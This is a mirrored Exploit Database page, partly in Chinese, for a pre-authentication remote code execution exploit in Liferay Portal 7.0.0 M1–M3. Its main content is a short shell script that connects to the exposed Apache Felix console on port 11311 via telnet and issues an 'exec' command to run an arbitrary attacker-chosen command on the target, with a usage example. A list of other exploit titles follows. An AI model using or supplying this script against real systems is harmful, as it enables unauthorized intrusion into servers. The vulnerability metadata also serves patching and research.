Liferay Portal 7.0.0 M1/7.0.0 M2/7.0.0 M3 – Remote Code Execution

Exploit Database
18 阅读

作者： drone

日期： 2014-12-30
类别：
- remote
平台：
- windows
来源：https://www.exploit-db.com/exploits/35652/

#!/bin/sh

# Exploit title: Liferay Portal 7.0.0 M1, 7.0.0 M2, 7.0.0 M3 RCE
# Date: 11/16/2014
# Exploit author: drone (@dronesec)
# Vendor homepage: http://www.liferay.com/
# Software link: http://downloads.sourceforge.net/project/lportal/Liferay%20Portal/7.0.0%20M2/liferay-portal-tomcat-7.0-ce-m2-20141017162509960.zip
# Version: 7.0.0 M1, 7.0.0 M2, 7.0.0 M3
# Fixed in: 7.0.3
# Tested on: Windows 7

# Pre-auth command injection using an exposed Apache Felix, 
# exposed by default on all Liferay Portal 7.0 installs.
#
# ./liferay_portal7.sh 192.168.1.1 "cmd.exe /C calc.exe"
#


(echo open $1 11311
sleep 1
echo system:getproperties
sleep 1
echo exec \"$2\"
sleep 1
) | telnet

last Exploits
Liferay Portal 7.0.0 M1/7.0.0 M2/7.0.0 M3 – Remote Code Execution的更多信息

Mozilla Firefox < 50.0.2 - 'nsSMILTimeContainer::NotifyTimeChange()' Remote Code Execution (Metasploit)：
Call of Duty Modern Warefare 2 – Buffer Overflow：
Microsoft Windows Media Center – MCL (MS15-100) (Metasploit)：
BigAnt Server 2.97 – DUPF Command Arbitrary File Upload (Metasploit)：
Freefloat FTP Server 1.0 – ‘ABOR’ Remote Buffer Overflow：
SePortal 2.5 – SQL Injection / Remote Code Execution (Metasploit)：
ManageEngine Eventlog Analyzer – Arbitrary File Upload (Metasploit)：
HP OpenView Network Node Manager (OV NNM) – nnmRptConfig nameParams Buffer Overflow (Metasploit)：